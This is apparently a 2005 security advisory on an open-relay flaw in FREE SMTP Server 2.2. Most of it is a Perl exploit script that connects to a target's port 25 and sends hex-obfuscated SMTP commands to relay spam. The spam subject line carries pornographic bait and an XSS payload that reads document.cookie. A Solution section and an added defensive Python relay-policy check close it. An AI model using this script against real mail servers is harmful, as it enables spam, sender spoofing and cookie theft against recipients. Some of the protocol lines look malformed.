FREE SMTP Spam Filter Vulnerability
Reported by basher13

Update:
1:48 03/09/2005


Subject:
"FREE SMTP Spam Filter Vulnerability"



Version:
FREE SMTP Server  2.2



Operating System:
- WINDOWS 95
- WINDOWS 98
- WINDOWS NT 
- WINDOWS XP



Typical software:
- freeware



Vendor URL:
Mail - info@softstack.com
WWW - http://www.softstack.com/





Description:
Free SMTP Server is a free SMTP server program for Windows that enables you to send messages directly from your computer. 
This program is used as a relay for sending newsletters, distributing messages to different mailing lists, 
sending notifications to your customers, as well as for sending individual messages if you use it with our mass mailer 
1st Mass Mailer. You can use it instead of the SMTP server of your Internet Service Provider (ISP). 





Vulnerability:
The bug is an open SMTP relay. The remote host is running an SMTP mail relay, which anyone could use to send 
email. It may also be possible to specify wrong sender addresses. This could be used to send spam, malicious code, 
trojans, XSS/CSS, worms/viruses or junk mail.





Exploit:
#!/usr/bin/perl
#
#    FREE SMTP Spam Filter Exploit
# ------------------------------------
#  Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.softstack.com/
# 

use IO::Socket;
use Socket;

print("\n   FREE SMTP Spam Filter Exploit\n");
print(" ---------------------------------\n\n");

# Change these values to your own
$helo = "mail.test"; # HELO
$mfrom = "[support@vuln.test]"; # MAIL FROM
$rcpto = "[root@localhost]"; # RCPT TO
$date = "11 Feb 2099 12:07:10"; # Date
$from = "Micro SEX's"; # From mailer
$subject = "Check the new version.. ооо\n".
"[b]VICKY VETTE[/b][i]is HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!![/i]".
"[br][a href=http://127.0.0.1 onMouseOver=alert(document.cookie);]Click Here[/a]"; # subject spammmer

if($#ARGV < 0 || $#ARGV > 1) { 
die "usage: perl $0 [IP/host] \nExam: perl $0 127.0.0.1 \n" };

$adr = $ARGV[0];
$prt = "25";

# Do not change these: hex-escaped SMTP commands and headers
$act1 = "\x48\x45\x4c\x4f $helo";
$act2 = "\x4d\x41\x49\x4c \x46\x52\x4f\x4d\x3a$mfrom";
$act3 = "\x52\x43\x50\x54 f\x54\x4f\x3a$rcpto";
$act4 = "\x44\x41\x54\x41";
$act5 = "\x44\x61\x74\x65\x3a $date";

$sub = 
"\x46\x72\x6f\x6d\x3a $from".
"\x53\x75\x62\x6a\x65\x63\x74\x3a $subject\x2e".
"\x51\x55\x49\x54";

print "[+] Connect to $adr..\n";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to $adr:$prt\n";
print "[+] Connected!\n";
$remote->autoflush(1);
print "[*] Send HELO..";
print $remote "$act1" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send MAIL FROM..";
print $remote "$act2" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send RCPT TO..";
print $remote "$act3" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send DATA..";
print $remote "$act4" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send DATE..";
print $remote "$act5" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send Sub Mail..";
print $remote "$sub" or die "\n[-] Error: can't send xploit code\n";
print "[OK]\n";
print "[*] QUIT..\n";
print "[+] MAIL SPAMWNED!\n\n";
close $remote;
print "press any key to exit..\n";
$bla = <STDIN>;
  




Solution:
The server should be deactivated or uninstalled if it is not necessary. Do not allow everyone to send email over your 
mail relay, and do not allow arbitrary sender addresses to be specified. To make the server harder to find, the 
daemon could be configured to listen on another port (e.g. 8025). Try to prevent unwanted connection attempts by 
filtering traffic with a firewall. Altering the application banner can confuse an attacker and lead him to 
identify the wrong software.
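
The two relay restrictions from the Solution (who may relay, and which sender addresses they may use), written as an added example; it is not part of the original advisory or of the vendor's software. The trusted networks, the local domain and the sample transactions are constructed assumptions.

```python
import ipaddress

# Constructed policy values (assumptions for this example, not from the advisory).
TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "192.0.2.0/24")]
LOCAL_DOMAINS = {"example.test"}  # domains this server receives for and may send as


def domain_of(path):
    """Return the lower-cased domain of an SMTP path such as '<user@host>', else None."""
    addr = path.strip().strip("<>")
    if addr.count("@") != 1:
        return None
    local, domain = addr.split("@")
    if not local or not domain:
        return None
    return domain.lower().rstrip(".")


def relay_decision(client_ip, mail_from, rcpt_to):
    """Evaluate one RCPT TO; returns (smtp_reply_code, reason)."""
    rcpt_domain = domain_of(rcpt_to)
    if rcpt_domain is None:
        return 501, "malformed recipient"
    if rcpt_domain in LOCAL_DOMAINS:
        return 250, "local delivery"  # inbound mail for our own domains
    # Recipient is external, so this is a relay request.
    ip = ipaddress.ip_address(client_ip)
    if not any(ip in net for net in TRUSTED_NETS):
        return 550, "relaying denied"  # not everyone may relay
    if domain_of(mail_from) not in LOCAL_DOMAINS:
        return 550, "sender domain not permitted"  # no arbitrary senders
    return 250, "relay permitted"


# Constructed sample transactions: (client IP, MAIL FROM, RCPT TO).
SAMPLES = [
    ("203.0.113.7", "<support@vuln.test>", "<user@elsewhere.test>"),
    ("192.0.2.10", "<support@vuln.test>", "<user@elsewhere.test>"),
    ("192.0.2.10", "<news@example.test>", "<user@elsewhere.test>"),
    ("203.0.113.7", "<someone@other.test>", "<postmaster@example.test>"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", relay_decision(*sample))
```

An open relay is the case where the first sample would return 250; with this policy only the trusted client using a local sender domain is relayed.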





Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com